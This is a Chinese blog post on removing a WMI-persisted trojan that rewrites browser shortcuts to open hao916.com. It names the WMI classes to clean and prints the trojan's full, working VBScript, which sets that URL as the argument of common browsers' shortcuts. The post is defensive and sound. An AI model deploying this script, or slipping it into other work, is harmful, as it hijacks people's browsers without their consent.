WMI 定时启动木马

最新推荐文章于 2024-02-29 12:00:00 发布
最新推荐文章于 2024-02-29 12:00:00 发布
阅读量6.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzz3265/article/details/54021162
版权

现象: 某些浏览器的快捷方式经常性自动被修改, 相当于主页修改成 hao916.com/.....


使用WMI_Tools 工具

找到以下类

__EventFilter
ActiveScriptEventConsumer
__FilterToConsumerBinding
__TimerInstruction

删除里面相关的实例


木马脚本如下

On Error Resume Next:
Const link = "http://hao916.com/?r=bdypjtssxx&m=d1":
Const link360 = "http://hao916.com/?r=bdypjtssxx&m=d1&s=3":
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\xxx\Desktop,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":
browsersArr = split(browsers,","):
Set oDic = CreateObject("scripting.dictionary"):
For Each browser In browsersArr:
oDic.Add LCase(browser), browser:
Next:
lnkpathsArr = split(lnkpaths,","):
Set oFolders = CreateObject("scripting.dictionary"):
For Each lnkpath In lnkpathsArr:
oFolders.Add lnkpath, lnkpath:
Next:
Set fso = CreateObject("Scripting.Filesystemobject"):
Set WshShell = CreateObject("Wscript.Shell"):
For Each oFolder In oFolders:
If fso.FolderExists(oFolder) Then:
For Each file In fso.GetFolder(oFolder).Files:
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:
Set oShellLink = WshShell.CreateShortcut(file.Path):
path = oShellLink.TargetPath:
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):
If oDic.Exists(LCase(name)) Then:
If LCase(name) = LCase("360se.exe") Then:
oShellLink.Arguments = link360:
Else:
oShellLink.Arguments = link:
End If:
If file.Attributes And 1 Then:
file.Attributes = file.Attributes - 1:
End If:
oShellLink.Save:
End If:
End If:
Next:
End If:
Next:


Yofoo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
浏览器被hao123,hao524劫持的解决办法
01-03
解决办法: 1、修改快捷方式、在快捷方式上右击属性对话框手工删除网址的部分 2、加载了启动项的,在注册表、启动项、服务中搜索相关网址信息,找到后删除 3、使用wmitools工具删除wmi恶意代码 压缩包里包括wmitools软件
WMI服务是什么?Windows 7系统如何禁用WMI服务?
weixin_34256074的博客
08-08 1487
WMI服务是什么?Win7系统如何禁用WMI服务?通过WMI服务我们可以访问、配置、管理和监视几乎所有的Windows资源,但是很少用户会使用WMI服务,所以有些用户就想禁用WMI服务,那么该如何操作呢?请看下文。 WMI是什么服务? (WMI),中文名字叫Windows管理规范。从Windows 2000开始,WMI(Windows 管理规范)就内置...
Windows安全基础——Windows WMI详解
m0_59598029的博客
02-29 877
WMI(Windows Management Instrumentation, Windows管理规范)是Windows2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,DistributionModel)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。
Windows系统下设置程序开机自启(WinSW)
10-17 654
WinSW可以将Windows上的任何程序作为系统服务进行管理,已达到开机自启的效果。
Windows开启WMI时一些总结
weixin_30567225的博客
02-09 2511
  通过远程的方式连接WMI获取计算机信息时,可能会出现远程主机拒绝访问,这时就要通过下面的方式来开启当前计算机的WMI服务,下面以Win7和Win10为例来进行相关的说明,通过一步步排查去连接远程服务。 一 在本机测试是否可以连接远程主机WMI服务   1 按下Windows+R组合键,调用系统运行窗口。   2 输入wbemtest命令。 图1 调用WMI测试器   3 打开W...
wmi启动项异常是什么意思_卡车“身份证”上的VIN、WMI、VDS、VIS是啥?
weixin_34316162的博客
01-24 2158
在中国,所有人都有一个独一无二的身份证。在身份证上的一串号码中包含着不少信息,一个人的出身地(户籍地)、生日,性别以及当地的出生顺序号等信息都在里面。其实和人一样,车辆也有自己的“身份证”,车辆的“身份证”上有一串号码,其中包含着许多信息。具体都包含哪些内容,该如何识别,今天官微君就和大家好好聊聊这事儿。汽车身份证 VIN码全球汽车年产量达数千万辆,产地、类别、型号各异,为了便于管理和分类,美国和...
解决利用WMI劫持浏览器主页为hao123hao916等的修复工具及方法
02-10
该工具为最流行的版本 1.50.1131.1,75% 的安装比例,挺老的。使用完工具,要把所有浏览器的快捷方式,都改好。改完了,删掉任务栏上浏览器的快速启动项,重新添加改完了的浏览器快捷方式。
python wmi 配置_StartMode为“自动(延迟启动)”的Windows服务的Python WMI查询
weixin_39755625的博客
12-22 534
任何人都有一个很好的技巧(用Python)来检测配置了启动类型为“自动(延迟启动)”的Windows服务?我认为WMI会是一条路,但配置为“自动”和“自动(延迟启动)”的服务都显示为“自动”的启动模式。例如,在使用Services.msc的本地Windows 7框中,我看到“Windows Update”配置为“自动(延迟启动)”,但WMI仅显示为“自动”:>>> c = wmi...
wmi远程启动exe程序
game_shader
01-18 5834
一、vbs:WMI远程控制机器时报0x80070005拒绝访问错误的解决方法 昨天晚上学习一个WMI远程连接机器的方法,可是始终报错,错误代码为0x80070005;拒绝访问,今天上午看到别人的博客里写到远程连接机器不成功的方法,试了一下果然OK了,以免以后忘掉,所以记在这里; wmic /node:[机器IP] /user:[管理员账户名] /password:[密码]  process
C++通过WMI启动/停止服务,修改服务类型 (
热门推荐
在水一方
03-14 1万+
stdafx.h #pragma once #define WIN32_LEAN_AND_MEAN // 从 Windows 头中排除极少使用的资料 #define _CRT_SECURE_NO_WARNINGS #define _CRT_SECURE_NO_DEPRECATE #include #include #include using namesp
MASM32编程通过WMI获取Windows计划任务
Purpleendurer@CSDN
04-19 3112
  上回MASM32编程使用了Windows系统提供的API函数:NetScheduleJobEnum()来枚举Windows计划任务(详见 MASM32编程枚举Windows计划任务,http://blog.csdn.net/Purpleendurer/archive/2009/11/05/4774148.aspx),这次通过WMI来实现。  需要注意的是:不管是通过WMI,还是使用API函
MASM32编程通过WMI获取Windows计划任务(源代码+EXE下载)
04-19
  上回用MASM32编程使用了Windows系统提供的API函数:NetScheduleJobEnum()来枚举Windows计划任务(详见 MASM32编程枚举Windows计划任务,http://blog.csdn.net/Purpleendurer/archive/2009/11/05/4774148.aspx),这次通过WMI来实现。   需要注意的是:不管是通过WMI,还是使用API函数NetScheduleJobEnum(),都只能枚举使用Win32_ScheduledJob类别或at.exe实用程序创建的计划任务。   所以 pe_xscan 在扫描计划任务时使用的是另外一种方法:-D
WMI配置指南与检查工具
06-21
其中含有WMI的配置信息,和常用的检测错误方法,WMI 中的“Instrumentation”特指 WMI 可以获得关于计算机内部状态的信息,这与汽车仪表盘获得并显示引擎的状态信息非常类似。WMI 对磁盘、进程、和其他 Windows 系统对象进行建模,从而实现“指示”功能。这些计算机系统对象采用类来建立模型,例如 Win32_LogicalDisk 或 Win32_Process; 如您所料,Win32_LogicalDisk 类用于建立在计算机上安装的逻辑磁盘的模型,Win32_Process 类用于建立正在计算机上运行的任何进程的模型。这些类基于一个名为通用信息模型(Common Information Model,CIM)的可扩展架构。CIM 架构是分布式管理任务组(Distributed Management Task Force)的一个公开标准
如何获取系统安装日期和启动时间(C#)
06-10
如何获取系统安装日期和启动时间(C#)源码
编写WMI脚本好帮手
03-15
脚本编程好帮手WMIVSVBS脚本编程好帮手脚本编程好帮手脚本编程好帮手
WMI.rar_wmi
09-22
测试操作系统的WMI功能是否开启,无特别大的功能。
使用WMI检测启动和停止操作系统过程的示例。
10-19
使用WMI检测启动和停止操作系统过程的示例。很好的一套demo,注释是日文的,下载自己翻译吧,我对日文也不懂。
node-v12.16.3-x86.msi
最新发布
04-25
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
云计算基础课件—架构dr.pptx
04-25
云计算基础课件—架构dr.pptx
WMI如何启动MySQL
09-24
如果你想要通过WMI启动MySQL,可以按照以下步骤进行操作: 1. 打开命令提示符:在开始菜单中搜索“cmd”,然后右键单击“命令提示符”并选择“以管理员身份运行”。 2. 输入以下命令来连接到WMI服务:wmic 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值